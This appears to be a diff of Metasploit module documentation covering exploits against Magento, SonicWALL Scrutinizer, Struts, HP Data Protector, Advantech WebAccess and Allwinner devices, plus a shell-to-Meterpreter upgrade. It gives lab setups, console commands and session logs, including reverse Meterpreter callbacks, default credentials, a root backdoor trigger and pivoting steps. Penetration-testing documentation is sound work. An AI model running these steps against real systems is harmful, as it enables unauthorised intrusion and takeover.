License: Metasploit Framework License (BSD)
|
||||
Rank: Normal
|
||||
Disclosed: 2013-05-12
|
||||
|
||||
Available targets:
|
||||
Id Name
|
||||
-- ----
|
||||
0 auto
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FTPPASS password no The password for the specified username
|
||||
FTPUSER ftptest no The username to authenticate as
|
||||
RHOST 10.10.10.1 yes The target address
|
||||
RPORT 21 yes The target port
|
||||
SLEEP 5 no Time to wait before checking if job has completed.
|
||||
|
||||
Payload information:
|
||||
|
||||
Description:
|
||||
Submit JCL to z/OS via FTP and SITE FILE=JES. This exploit requires
|
||||
valid credentials on the target system
|
||||
|
||||
msf exploit(ftp_jcl_creds) > check
|
||||
|
||||
[+] 10.10.10.1:21 - Successfully connected to FTP server.
|
||||
[*] 10.10.10.1:21 - Found IBM z/OS Banner and JES commands accepted
|
||||
[+] The target is vulnerable.
|
||||
msf exploit(ftp_jcl_creds) >
|
||||
```
|
||||
|
||||
|
||||
## Debugging
|
||||
|
||||
If the exploit or check is not working, turn on the VERBOSE and FTPDEBUG settings of the exploit and run it again. On a vulnerable system, the output should look similar to the following.
|
||||
|
||||
```
|
||||
msf exploit(ftp_jcl_creds) > set FTPDEBUG true
|
||||
FTPDEBUG => true
|
||||
msf exploit(ftp_jcl_creds) > set VERBOSE true
|
||||
VERBOSE => true
|
||||
msf exploit(ftp_jcl_creds) > check
|
||||
|
||||
[*] 10.10.10.1:21 - Connecting to FTP server 10.10.10.1:21...
|
||||
[*] 10.10.10.1:21 - FTP recv: "220-FTPD1 IBM FTP CS V2R1 at ZOS.EXAMPLE.COM, 16:52:31 on 2016-04-27.\r\n220 Connection will close if idle for more than 5 minutes.\r\n"
|
||||
[*] 10.10.10.1:21 - Connected to target FTP server.
|
||||
[*] 10.10.10.1:21 - Authenticating as ftptest with password password...
|
||||
[*] 10.10.10.1:21 - FTP send: "USER ftptest\r\n"
|
||||
[*] 10.10.10.1:21 - FTP recv: "331 Send password please.\r\n"
|
||||
[*] 10.10.10.1:21 - Sending password...
|
||||
[*] 10.10.10.1:21 - FTP send: "PASS password\r\n"
|
||||
[*] 10.10.10.1:21 - FTP recv: "230 FTPTEST is logged on. Working directory is \"FTPTEST.\".\r\n"
|
||||
[+] 10.10.10.1:21 - Successfully connected to FTP server.
|
||||
[*] 10.10.10.1:21 - FTP send: "site file=jes\r\n"
|
||||
[*] 10.10.10.1:21 - FTP recv: "200 SITE command was accepted\r\n"
|
||||
[*] 10.10.10.1:21 - Found IBM z/OS Banner and JES commands accepted
|
||||
[+] The target is vulnerable.
|
||||
msf exploit(ftp_jcl_creds) >
|
||||
```
|
||||
|
||||
## Notes
|
||||
|
||||
The submitted job will leave a joblog on the system under the credentials used.
|
|
@ -0,0 +1,90 @@
|
|||
Magento is a popular open-source e-commerce platform written in PHP. An unserialization
|
||||
vulnerability exists in the product that allows an unauthenticated user to gain arbitrary
|
||||
code execution.
|
||||
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
Magento Community and Enterprise editions before 2.0.6 are affected. The magento_unserialize module
|
||||
was specifically tested against version 2.0.6, on Ubuntu 14.04 and Debian.
|
||||
|
||||
For testing purposes, you can download the vulnerable applications [here](https://www.exploit-db.com/apps/d34a83e80f927d7336cc8ef37a9867f4-magento2-2.0.5.tar.gz).
|
||||
|
||||
## Verification Steps
|
||||
|
||||
To set up a vulnerable version of Magento, please follow these steps. This is specific to
|
||||
Ubuntu 14, and assumes you are installing Magento under /var/www/html/.
|
||||
|
||||
1. Set up an [Ubuntu](http://www.ubuntu.com/) box.
|
||||
2. Open a terminal, and enter: ```sudo apt-get install apache2```
|
||||
3. Enter: ```sudo apt-get install php5```
|
||||
4. Enter: ```sudo a2enmod rewrite```
|
||||
5. Add the following content to /etc/apache2/sites-enabled/000-default.conf, inside the VirtualHost block:
|
||||
|
||||
```
|
||||
<Directory /var/www/html>
|
||||
Options Indexes FollowSymLinks MultiViews
|
||||
AllowOverride All
|
||||
Order allow,deny
|
||||
allow from all
|
||||
</Directory>
|
||||
```
|
||||
|
||||
6. Download the [vulnerable Magento app](https://www.exploit-db.com/apps/d34a83e80f927d7336cc8ef37a9867f4-magento2-2.0.5.tar.gz)
|
||||
7. Extract the compressed file: ```tar -xf magento2-2.0.5.tar.gz```
|
||||
8. Move the files and directories of magento2-2.0.5 to /var/www/html/ (make sure .htaccess is copied too)
|
||||
9. In terminal, enter: ```sudo chmod 644 /var/www/html/.htaccess```
|
||||
10. Enter: ```sudo service apache2 restart```
|
||||
11. Enter: ```sudo apt-get install mysql-server-5.6```, and follow MySQL's installation prompts.
|
||||
12. Enter: ```sudo apt-get install php5-mysql```
|
||||
13. Enter: ```sudo apt-get install php5-mcrypt```
|
||||
14. Enter: ```sudo php5enmod mcrypt```
|
||||
15. Enter: ```sudo apt-get install php5-xsl php5-curl php5-intl```
|
||||
16. Enter: ```sudo service apache2 restart```
|
||||
17. cd to /var/www/html, enter: ```sudo mkdir tmp```, and cd to tmp
|
||||
18. In tmp, do: ```curl -sS https://getcomposer.org/install | php```
|
||||
19. Enter: ```sudo mv composer /usr/local/bin/composer```
|
||||
20. In /var/www/html, do: ```composer install```
|
||||
21. You will be asked for a username (public key) and password (private key). You can register
|
||||
for one here: https://marketplace.magento.com/
|
||||
22. Back to terminal, enter: ```mysql -h localhost -u root -p[password]```
|
||||
23. In mysql, enter: ```create database magento```, and exit
|
||||
24. Go to http://localhost with a browser, and install Magento through the web interface.
|
||||
25. After installation, back to the terminal, and enter: ```sudo rm -rf var/cache/*```
|
||||
26. Enter: ```sudo rm -rf var/generation/*```
|
||||
27. Enter: ```sudo rm -rf var/page_cache/*```
|
||||
28. cd to /var/www/html/bin
|
||||
29. Enter: ```sudo php magento deploy:mode:set developer```. It should say that you're in developer mode.
|
||||
30. Enter: ```sudo php magento setup:static-content:deploy```
|
||||
31. Enter: ```sudo php magento indexer:reindex```
|
||||
32. Enter: ```sudo chmod -R 777 /var/www/html```
|
||||
33. Go to http://localhost, you should see Magento up and running.
|
||||
34. From Magento, log in as admin, and create a product. After creating one, make sure this product
|
||||
is also searchable from the front-end.
|
||||
|
||||
After setting up Magento, you can use your exploit module:
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: ```use exploit/multi/http/magento_unserialize```
|
||||
3. Do: ```set RHOST [IP]```
|
||||
4. Do: ```set PAYLOAD php/meterpreter/reverse_tcp```
|
||||
5. Do: ```set LHOST [IP]```
|
||||
6. Do: ```exploit```
|
||||
7. And you should get a session
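The console steps above can also be run as a resource script; a minimal sketch, with the IP addresses as placeholders taken from the demonstration below:

```
use exploit/multi/http/magento_unserialize
set RHOST 192.168.1.108
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.1.94
exploit
```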
|
||||
|
||||
## Demonstration
|
||||
|
||||
```
|
||||
msf exploit(magento_unserialize) > check
|
||||
[*] 192.168.1.108:80 The target appears to be vulnerable.
|
||||
msf exploit(magento_unserialize) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.1.94:4444
|
||||
[+] 192.168.1.108:80 - generated a guest cart id
|
||||
[+] 192.168.1.108:80 - backdoor done!
|
||||
[*] Sending stage (33721 bytes) to 192.168.1.108
|
||||
[*] Meterpreter session 6 opened (192.168.1.94:4444 -> 192.168.1.108:46835) at 2016-06-02 17:09:34 -0500
|
||||
[+] 192.168.1.108:80 - Deleted lP5UgbUBLm1sWN25gWfZBqYKms.php
|
||||
|
||||
meterpreter >
|
||||
```
|
|
@ -0,0 +1,67 @@
|
|||
Dell SonicWALL Scrutinizer is a multi-vendor application traffic analytics, visualization, and reporting tool used to measure and troubleshoot real-time network performance. It is used with routers, firewalls, and other network equipment.
|
||||
|
||||
In version 11.0.1, SonicWall Scrutinizer suffers from a vulnerability that allows a remote
|
||||
attacker to inject a malicious SQL string into the methodDetail parameter, and then gain
|
||||
control of execution under the context of SYSTEM on Windows, or Apache on Linux.
|
||||
|
||||
Authentication is required to exploit this vulnerability. However, SonicWALL Scrutinizer ships with a default username and password (admin:admin), so installations that keep the defaults are easy targets.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
As reported by the vendor, only version 11.0.1 is vulnerable to the SQL injection attack.
|
||||
|
||||
For testing purposes, you may download the vulnerable version of Dell SonicWALL Scrutinizer for Windows from:
|
||||
[http://software.sonicwall.com/ScrutinizerSW/184-003184-00_Rev_A_sonicwall-oem-Scrutinizer-windows-installer.exe](http://software.sonicwall.com/ScrutinizerSW/184-003184-00_Rev_A_sonicwall-oem-Scrutinizer-windows-installer.exe).
|
||||
|
||||
If you prefer the appliance, then you can get it from: [http://software.sonicwall.com/scrutinizerVA/184-003186-00_Rev_A_Dell_SonicWALL_ScrutinizerVA.zip](http://software.sonicwall.com/scrutinizerVA/184-003186-00_Rev_A_Dell_SonicWALL_ScrutinizerVA.zip).
|
||||
|
||||
## Verification Steps
|
||||
|
||||
For testing purposes, the Windows installer is a bit easier to use. You should be able to complete
|
||||
it by simply following the instructions on the screen.
|
||||
|
||||
The Linux appliance requires more steps. To be able to use it, make sure you have more than 20GB of free disk space. You may also need to modify the boot menu to [reset the root password](https://wiki.centos.org/TipsAndTricks/ResetRootPassword) if you cannot get past the Scrutinizer login screen.
|
||||
|
||||
Using the sonicwall_scrutinizer_methoddetail_sqli module is rather straightforward. Make sure
|
||||
you have a valid username and password, and configure the payload for the target. You will most
|
||||
likely use the module like this:
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: ```use exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli```
|
||||
3. Do: ```set RHOST [TARGET IP]```
|
||||
4. Do: ```set PAYLOAD [PAYLOAD NAME]``` (use ```show payloads``` for more info)
|
||||
5. Do: ```exploit```
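Put together, a typical run looks like the sketch below (all addresses are placeholders, and the module's credential options should also be set to a valid account, e.g. the default admin:admin):

```
msf > use exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli
msf exploit(sonicwall_scrutinizer_methoddetail_sqli) > set RHOST 192.168.1.200
msf exploit(sonicwall_scrutinizer_methoddetail_sqli) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(sonicwall_scrutinizer_methoddetail_sqli) > set LHOST 192.168.1.10
msf exploit(sonicwall_scrutinizer_methoddetail_sqli) > exploit
```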
|
||||
|
||||
## Scenarios
|
||||
|
||||
sonicwall_scrutinizer_methoddetail_sqli supports two platforms: Windows and Linux. By default,
|
||||
it can automatically find the right OS, and configure the exploit and payload generation
|
||||
accordingly.
|
||||
|
||||
**Using the module against Windows platform**
|
||||
|
||||
If sonicwall_scrutinizer_methoddetail_sqli is able to exploit SonicWALL Scrutinizer successfully,
|
||||
on Windows you will be compromising the host as SYSTEM - the highest privilege. However, since
|
||||
Windows does not allow you to delete the malicious executable that is in use, you will have to
|
||||
do this manually at some point after you've migrated to a different process. The exploit should tell you where this binary is with a message like this:
|
||||
|
||||
```
|
||||
[!] This exploit may require manual cleanup of 'YrfCO.exe' on the target
|
||||
```
|
||||
|
||||
**Using the module against Linux platform**
|
||||
|
||||
For the Linux platform, sonicwall_scrutinizer_methoddetail_sqli was specifically written against
|
||||
the Linux appliance provided by Dell, but it should also work against other similar machines.
|
||||
|
||||
Unlike Windows, if the module is able to successfully exploit the machine, you won't have the
|
||||
highest privilege; instead, you start off as the Apache user.
|
||||
|
||||
Automatic cleanup is not an issue on Linux. Both the PHP backdoor and the Linux binary
|
||||
should be automatically removed without problems.
|
||||
|
|
@ -0,0 +1,56 @@
|
|||
struts_dmi_exec is a module that exploits Apache Struts 2's Dynamic Method Invocation,
|
||||
and it supports Windows and Linux platforms.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
Apache Struts versions between 2.3.20 and 2.3.28 are vulnerable, except 2.3.20.2 and 2.3.24.2.
|
||||
The application's struts.xml also needs to set ```struts.enable.DynamicMethodInvocation``` to true and ```struts.devMode``` to false.
|
||||
|
||||
For testing purposes, here is how you would set up the vulnerable machine:
|
||||
|
||||
1. Download Apache Tomcat
|
||||
2. Download Java. [Choose an appropriate version](http://tomcat.apache.org/whichversion.html) based on the Apache Tomcat version you downloaded.
|
||||
3. Download the vulnerable [Apache Struts application](https://github.com/rapid7/metasploit-framework/files/241784/struts2-blank.tar.gz).
|
||||
4. Install Java first. Make sure you have the JAVA_HOME environment variable.
|
||||
5. Extract Apache Tomcat.
|
||||
6. In conf directory of Apache Tomcat, open the tomcat-users.xml file with a text editor.
|
||||
7. In tomcat-users.xml, add this role: ```<role rolename="manager-gui"/>```
|
||||
8. In tomcat-users.xml, add this role to user tomcat: ```<user username="tomcat" password="tomcat" roles="tomcat,manager-gui"/>```
|
||||
9. Remove other users.
|
||||
10. In a terminal or command prompt, ```cd``` to the bin directory, and run: ```catalina.bat run``` (or catalina.sh). You should have Apache Tomcat running on port 8080.
|
||||
11. Extract the vulnerable struts app: ```tar -xf struts2-blank.tar.gz```
|
||||
12. Navigate to the Apache Tomcat server with a browser on port 8080.
|
||||
13. Click on Manager App
|
||||
14. In the WAR file to deploy section, deploy struts2-blank.war
|
||||
15. Stop struts2-blank in the manager app.
|
||||
16. On the server, ```cd``` to ```apache-tomcat-[version]/webapps/struts2-blank/WEB-INF/classes```, open struts.xml with a text editor.
|
||||
17. In the XML file, update ```struts.enable.DynamicMethodInvocation``` to true
|
||||
18. In the XML file, update ```struts.devMode``` to false.
|
||||
19. Back to Apache Tomcat's manager app. Start the struts2-blank again.
|
||||
|
||||
And now you have a vulnerable server.
|
||||
|
||||
|
||||
## Options
|
||||
|
||||
**TMPPATH**
|
||||
|
||||
By default, the struts_dmi_exec exploit should be ready to go without much configuration. However,
|
||||
in case you need to change where the payload should be uploaded to, make sure to set the correct
|
||||
target, and then change the TMPPATH datastore option.
|
||||
|
||||
## Scenarios
|
||||
|
||||
struts_dmi_exec supports three platforms: Windows, Linux, and Java. By default, it uses Java, so
|
||||
you don't need to worry about configuring this. Running the module can be as simple as the usage
|
||||
explained in the Overview section.
|
||||
|
||||
However, native payloads do have their benefits (for example: Windows Meterpreter has better
|
||||
support than Java), so if you decide to switch to a different platform, here is what you do:
|
||||
|
||||
1. Do ```show targets```, and see which one you should be using
|
||||
2. Do ```set target [id]```
|
||||
3. Do ```show payloads```, which shows you a list of compatible payloads for that target.
|
||||
4. Do: ```set payload [payload name]```
|
||||
5. Do: ```exploit```
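A hedged sketch of that switch, assuming the Linux target has ID 1 on your version (check the ```show targets``` output first; the target ID and addresses here are placeholders):

```
msf exploit(struts_dmi_exec) > show targets
msf exploit(struts_dmi_exec) > set TARGET 1
msf exploit(struts_dmi_exec) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
msf exploit(struts_dmi_exec) > set LHOST 192.168.2.229
msf exploit(struts_dmi_exec) > exploit
```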
|
|
@ -0,0 +1,75 @@
|
|||
HP Data Protector is an automated backup and recovery software for single-server to enterprise
|
||||
environments. It provides cross-platform, online backup of data for Microsoft Windows, Unix,
|
||||
and Linux operating systems.
|
||||
|
||||
When the server is using Encrypted Control Communication, HP Data Protector allows a remote
|
||||
attacker to gain access without authentication, and gain arbitrary code execution under the
|
||||
context of SYSTEM.
|
||||
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
HP Data Protector versions 7, 8, and 9 are known to be affected.
|
||||
|
||||
hp_dataprotector_encrypted_comms was specifically tested against version 9.0.0 on Windows 2008.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
**Installing HP Data Protector**
|
||||
|
||||
Before installing HP Data Protector, a Windows domain controller is needed. This exploit was tested
|
||||
against [a Windows Server 2008 R2 SP1 domain controller](https://www.youtube.com/watch?v=Buj9oEgbRt8).
|
||||
|
||||
After setting up the domain controller, double-click on the HP Data Protector installer, and you
|
||||
should see this screen:
|
||||
|
||||
![screen_1](https://cloud.githubusercontent.com/assets/13082457/15794665/99a86238-29e4-11e6-8ccd-0e09b0c8a693.png)
|
||||
|
||||
Click on **Install Data Protector**. The installer should then ask you which installation type to use:
|
||||
|
||||
![screen_2](https://cloud.githubusercontent.com/assets/13082457/15794701/de31d07e-29e4-11e6-9410-0b88abe77afe.png)
|
||||
|
||||
Make sure to select **Cell Manager**, and click **Next**. Use all default settings.
|
||||
|
||||
**Enabling Encrypted Communication**
|
||||
|
||||
After the Setup Wizard is finished, we need to enable encrypted communication. First, open the
|
||||
Data Protector GUI:
|
||||
|
||||
![screen_3](https://cloud.githubusercontent.com/assets/1170914/15845344/d3a84ee4-2c37-11e6-821d-fe8002c94686.png)
|
||||
|
||||
Click on **Clients**, and then select the local client from the tree. You should see the **Connection** tab on the
|
||||
right, click on that.
|
||||
|
||||
![screen_4](https://cloud.githubusercontent.com/assets/1170914/15845351/df9929f8-2c37-11e6-9d82-8c519c030a5f.png)
|
||||
|
||||
Under the Connection tab, there should be an **Encrypted control communication** checkbox; make sure it is checked, and then click **Apply**.
|
||||
|
||||
**Using hp_dataprotector_encrypted_comms**
|
||||
|
||||
After the encrypted communication is enabled, you are ready to use
|
||||
hp_dataprotector_encrypted_comms. Here is what you do:
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: ```use exploit/windows/misc/hp_dataprotector_encrypted_comms```
|
||||
3. Do: ```set RHOST [IP ADDRESS]```
|
||||
4. Do: ```set PAYLOAD [PAYLOAD NAME]```
|
||||
5. Set other options as needed
|
||||
6. Do: ```exploit```, and you should receive a session like the following:
|
||||
|
||||
```
|
||||
msf exploit(hp_dataprotector_encrypted_comms) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.23.1:4444
|
||||
[*] 172.16.23.173:5555 - Initiating connection
|
||||
[*] 172.16.23.173:5555 - Establishing encrypted channel
|
||||
[*] 172.16.23.173:5555 - Sending payload
|
||||
[*] 172.16.23.173:5555 - Waiting for payload execution (this can take up to 30 seconds or so)
|
||||
[*] Sending stage (957999 bytes) to 172.16.23.173
|
||||
[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.173:49304) at 2016-06-06 22:16:54 -0500
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
```
|
||||
|
|
@ -0,0 +1,36 @@
|
|||
Advantech WebAccess is a web-based software package for human-machine interfaces and supervisory
|
||||
control and data acquisition (SCADA). WebAccess 8.0 suffers from a vulnerability that allows an
|
||||
attacker to upload a malicious file onto the web server, and gain arbitrary code execution under
|
||||
the context of IIS APPPOOL\WADashboard_pool.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
All builds of Advantech WebAccess 8.0 are affected:
|
||||
|
||||
* [WebAccess 8.0 _20150816](http://advcloudfiles.advantech.com/web/Download/webaccess/8.0/AdvantechWebAccessUSANode8.0_20150816.exe)
|
||||
* [WebAccess 8.0 _20141103](http://advcloudfiles.advantech.com/web/Download/webaccess/8.0/AdvantechWebAccessUSANode8.0_20141103_3.4.3.exe)
|
||||
|
||||
For exploitation, there is a difference between the two versions. The 2014 version of WebAccess 8.0
|
||||
had two upload actions in the UploadAjaxAction class: uploadBannerImage, and uploadImageCommon. The
|
||||
2015 version of WebAccess 8.0 added another upload action: uploadFile. This exploit uses the
|
||||
uploadImageCommon action because it works for both.
|
||||
|
||||
Advantech WebAccess 8.1 mitigated the vulnerability by enforcing authentication for
|
||||
UploadAjaxAction. However, keep in mind that WebAccess 8.1 comes with a default credential of
|
||||
user name "admin" with a blank password, which means the user is likely still at risk by using the
|
||||
default configuration.
|
||||
|
||||
advantech_webaccess_dashboard_file_upload will not attempt to exploit WebAccess 8.1.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start a Windows machine (such as Windows 7 SP1).
|
||||
2. To install Advantech WebAccess, make sure to install the Internet Information Services Windows
|
||||
feature.
|
||||
3. Download WebAccess 8.0, and install it. After installation, make sure the web application is
|
||||
operational by accessing it with a browser (on port 80).
|
||||
4. Start msfconsole
|
||||
5. Do: ```use exploit/windows/scada/advantech_webaccess_dashboard_file_upload```
|
||||
6. Do: ```set RHOST [TARGET_IP]```
|
||||
7. Set other options if needed
|
||||
8. Do: ```exploit```, and you should get a session.
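A minimal console sketch of those steps (the addresses are placeholders):

```
msf > use exploit/windows/scada/advantech_webaccess_dashboard_file_upload
msf exploit(advantech_webaccess_dashboard_file_upload) > set RHOST 192.168.1.25
msf exploit(advantech_webaccess_dashboard_file_upload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(advantech_webaccess_dashboard_file_upload) > set LHOST 192.168.1.10
msf exploit(advantech_webaccess_dashboard_file_upload) > exploit
```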
|
|
@ -0,0 +1,93 @@
|
|||
Vulnerable Allwinner SoC chips: H3, A83T, or H8, which rely on Kernel 3.4.

Vulnerable OS images:

* all OS images available for Orange Pis
* any for FriendlyARM's NanoPi M1
* SinoVoip's M2+ and M3
* Cuebietech's Cubietruck
* Linksprite's pcDuino8 Uno

Exploitation may be possible against Dragon (x10) and Allwinner Android tablets.
|
||||
|
||||
This module attempts to exploit a debug backdoor privilege escalation in Allwinner SoC based devices. It implements the Allwinner privilege escalation documented in [Metasploit issue #6869](https://github.com/rapid7/metasploit-framework/issues/6869). The backdoor is a simple debug kernel module: when "rootmydevice" is echoed into its proc entry, it escalates the shell to root.
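For reference, the backdoor can also be checked and triggered manually from a shell on the device; a minimal sketch, assuming the proc entry path shown in the module output below:

```
# check for the debug backdoor and trigger it (path taken from the module output below)
ls /proc/sunxi_debug/sunxi_debug && echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug
# the current shell should now be root
id
```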
|
||||
|
||||
## Usage
|
||||
|
||||
To use this module, you need a vulnerable device. An Orange Pi (PC model) running Lubuntu 14.04 v0.8.0 works, but other OSes for the device (as well as other devices) are also vulnerable.
|
||||
|
||||
- `use auxiliary/scanner/ssh/ssh_login`
|
||||
|
||||
```
|
||||
msf auxiliary(ssh_login) > set username orangepi
|
||||
username => orangepi
|
||||
msf auxiliary(ssh_login) > set password orangepi
|
||||
password => orangepi
|
||||
msf auxiliary(ssh_login) > set rhosts 192.168.2.21
|
||||
rhosts => 192.168.2.21
|
||||
msf auxiliary(ssh_login) > exploit
|
||||
|
||||
[*] 192.168.2.21:22 SSH - Starting bruteforce
|
||||
[+] 192.168.2.21:22 SSH - Success: 'orangepi:orangepi' 'uid=1001(orangepi) gid=1001(orangepi) groups=1001(orangepi),27(sudo),29(audio) Linux orangepi 3.4.39 #41 SMP PREEMPT Sun Jun 21 13:09:26 HKT 2015 armv7l armv7l armv7l GNU/Linux '
|
||||
[!] No active DB -- Credential data will not be saved!
|
||||
[*] Command shell session 1 opened (192.168.2.229:33673 -> 192.168.2.21:22) at 2016-05-17 21:55:27 -0400
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
- `use post/multi/escalate/allwinner_backdoor`
|
||||
|
||||
```
|
||||
msf post(allwinner_backdoor) > set verbose true
|
||||
verbose => true
|
||||
msf post(allwinner_backdoor) > set session 1
|
||||
session => 1
|
||||
msf post(allwinner_backdoor) > run
|
||||
```
|
||||
|
||||
## Successful exploitation
|
||||
|
||||
```
|
||||
[+] Backdoor found, exploiting.
|
||||
[+] Privilege Escalation Successful
|
||||
[*] Post module execution completed
|
||||
msf post(allwinner_backdoor) > sessions -i 1
|
||||
[*] Starting interaction with 1...
|
||||
|
||||
2013564244
|
||||
uHvwyYtCTXENEYdrCoKdgVxTpKlbnqsW
|
||||
true
|
||||
RUVRnPJFFgVpuqEiYXdtXpwdDZxVwZPS
|
||||
TitlDmvnSvINczARsMAKdajpRoXEohXO
|
||||
0
|
||||
RtBPRSiAsiGoFatKQVukpjIjGBpJdXqq
|
||||
id
|
||||
uid=0(root) gid=0(root) groups=0(root),27(sudo),29(audio),1001(orangepi)
|
||||
^Z
|
||||
Background session 1? [y/N] y
|
||||
```
|
||||
|
||||
## Graceful exit on non-vulnerable devices
|
||||
|
||||
```
|
||||
msf > use auxiliary/scanner/ssh/ssh_login
|
||||
msf auxiliary(ssh_login) > set username pi
|
||||
username => pi
|
||||
msf auxiliary(ssh_login) > set password raspberry
|
||||
password => raspberry
|
||||
msf auxiliary(ssh_login) > set rhosts basementpi
|
||||
rhosts => basementpi
|
||||
msf auxiliary(ssh_login) > exploit
|
||||
|
||||
[*] 192.168.2.80:22 SSH - Starting bruteforce
|
||||
[+] 192.168.2.80:22 SSH - Success: 'pi:raspberry' 'uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),106(netdev),996(gpio),997(i2c),998(spi),999(input) Linux basementpi 4.1.19-v7+ #858 SMP Tue Mar 15 15:56:00 GMT 2016 armv7l GNU/Linux '
|
||||
[!] No active DB -- Credential data will not be saved!
|
||||
[*] Command shell session 1 opened (192.168.2.229:36438 -> 192.168.2.80:22) at 2016-05-17 22:19:57 -0400
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf auxiliary(ssh_login) > use post/multi/escalate/allwinner_backdoor
|
||||
msf post(allwinner_backdoor) > set verbose true
|
||||
verbose => true
|
||||
msf post(allwinner_backdoor) > set session 1
|
||||
session => 1
|
||||
msf post(allwinner_backdoor) > run
|
||||
|
||||
[-] Backdoor /proc/sunxi_debug/sunxi_debug not found.
|
||||
[*] Post module execution completed
|
||||
```
|
|
@ -0,0 +1,128 @@
|
|||
shell_to_meterpreter allows you to upgrade a shell session to Meterpreter. It can be launched as
|
||||
a post module, or from the sessions command. By default, this module will use a reverse
|
||||
Meterpreter.
|
||||
|
||||
## Important Options
|
||||
|
||||
**HANDLER**
|
||||
|
||||
The HANDLER option controls whether the module starts a multi/handler to receive the connection. By default this is true, because you will normally need it. But if for some reason you are setting up a handler separately, you may want to set it to false.
|
||||
|
||||
**LHOST**
|
||||
|
||||
The LHOST option is for the reverse Meterpreter you are upgrading to. By default, the module can
|
||||
figure it out for you. But over a pivot, you will need to manually set this, because session
|
||||
objects don't necessarily have that information.
|
||||
|
||||
**LPORT**
|
||||
|
||||
The LPORT option is also for the reverse Meterpreter you are upgrading to.
|
||||
|
||||
**PAYLOAD_OVERRIDE**
|
||||
|
||||
This is an advanced option: if you don't want to use the default reverse Meterpreter, you can specify a different payload here.
|
||||
|
||||
## Scenarios
|
||||
|
||||
**Using sessions -u**
|
||||
|
||||
```sessions -u``` is the same as running the post module against a specific session. However, this
|
||||
is limited to using the default reverse Meterpreter payload, so you will not be able to use it
|
||||
via a pivot.
|
||||
|
||||
Usage is rather simple. At the msf prompt, first check the sessions table to see which session you want to upgrade:
|
||||
|
||||
```
|
||||
msf > sessions
|
||||
|
||||
Active sessions
|
||||
===============
|
||||
|
||||
Id Type Information Connection
|
||||
-- ---- ----------- ----------
|
||||
1 shell windows 192.168.146.1:4444 -> 192.168.146.128:1204 (192.168.146.128)
|
||||
|
||||
msf >
|
||||
```
|
||||
|
||||
In this demonstration, session 1 is a shell, so we upgrade that:
|
||||
|
||||
```
|
||||
msf > sessions -u 1
|
||||
```
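Running the post module directly is equivalent and exposes the options described above; a minimal sketch (the LHOST value is a placeholder):

```
msf > use post/multi/manage/shell_to_meterpreter
msf post(shell_to_meterpreter) > set SESSION 1
msf post(shell_to_meterpreter) > set LHOST 192.168.146.1
msf post(shell_to_meterpreter) > set LPORT 4433
msf post(shell_to_meterpreter) > run
```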
|
||||
|
||||
**Upgrading a shell via a pivot**
|
||||
|
||||
This scenario is a little tricky, because the default options won't work over a pivot. The problem is that if you got the session with a bind shell, the detected LHOST will be "Local Pipe", and if you got it with a reverse shell, the detected LHOST is actually an IP range. Neither is an acceptable format for the LHOST option.
|
||||
|
||||
There are two ways you can go: either manually set LHOST, or choose a bind Meterpreter. The second is really easy; all you need to do is ```set PAYLOAD_OVERRIDE``` to a bind payload.
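For example, a hedged sketch of the bind approach (the payload name shown is one well-known bind Meterpreter; pick whichever fits the target):

```
msf post(shell_to_meterpreter) > set SESSION 2
msf post(shell_to_meterpreter) > set PAYLOAD_OVERRIDE windows/meterpreter/bind_tcp
msf post(shell_to_meterpreter) > set LPORT 4433
msf post(shell_to_meterpreter) > run
```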
|
||||
|
||||
If you prefer to manually set LHOST, this should be the compromised host you're pivoting from.
|
||||
Perhaps a diagram will help to explain this:
|
||||
|
||||
```
|
||||
|-------------| |-------------------| |-------------------|
|
||||
| Attacker | <---> | Compromised box A | <---> | Compromised box B |
|
||||
|-------------| |-------------------| |-------------------|
|
||||
192.168.146.1 192.168.146.128
|
||||
192.168.1.101 (VPN) 192.168.1.102(VPN)
|
||||
```
|
||||
|
||||
In this example, let's start with breaking into box A (192.168.146.128):
|
||||
|
||||
```
|
||||
[*] Sending stage (957999 bytes) to 192.168.146.128
|
||||
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.128:1208) at 2016-04-28 22:45:09 -0500
|
||||
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
We discover that box A is on a VPN, with IP 192.168.1.101, and we find box B at 192.168.1.102. We need to create the pivot:
|
||||
|
||||
```
|
||||
msf > route add 192.168.1.1 255.255.255.0 1
|
||||
[*] Route added
|
||||
```
|
||||
|
||||
And we break into box B (192.168.1.102) with a Windows bind shell:
|
||||
|
||||
```
|
||||
[*] Command shell session 2 opened (Local Pipe -> Remote Pipe) at 2016-04-28 22:47:03 -0500
|
||||
```
|
||||
|
||||
Notice this says "Local Pipe", which means box B's session object doesn't really know box A's IP.
|
||||
If you try to run shell_to_meterpreter this way, this is all you get:
|
||||
|
||||
```
|
||||
msf post(shell_to_meterpreter) > run
|
||||
|
||||
[*] Upgrading session ID: 2
|
||||
[-] LHOST is "Local Pipe", please manually set the correct IP.
|
||||
[*] Post module execution completed
|
||||
```
|
||||
|
||||
